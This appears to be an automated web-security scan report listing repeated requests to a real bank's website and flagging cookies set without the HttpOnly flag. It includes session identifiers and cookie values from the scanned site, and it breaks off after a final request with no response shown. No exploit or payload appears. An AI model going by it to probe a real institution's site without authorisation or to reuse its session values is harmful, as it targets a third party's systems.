HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:07 GMT Content-length: 4747 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:05 GMT Content-length: 6663 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:06 GMT Content-length: 6816 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The following cookie was issued by the application and does not have the HttpOnly flag set:
ISD_WCM_COOKIE=2079611658.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Location: https://www.wellsfargo.com/locator/ Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/preSearch HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-type: text/html Cache-Control: no-cache="Set-Cookie" Location: https://www.wellsfargo.com/locator/atm/search Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:17 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:41 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:43 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/ Content-Language: en Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /per/more/banking HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:39 GMT Content-length: 10949 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /per/more/loans_credit HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:40 GMT Content-length: 10611 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_credit/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:47 GMT Content-length: 7834 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head> <title>Wells Fargo - Personal C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7654 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 7546 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 6368 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 5794 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/online/guarantee HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/HE_selector HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:58 GMT Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/applications_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/brokerage_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/deposit_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/pll_select HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:56 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rates/rates_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
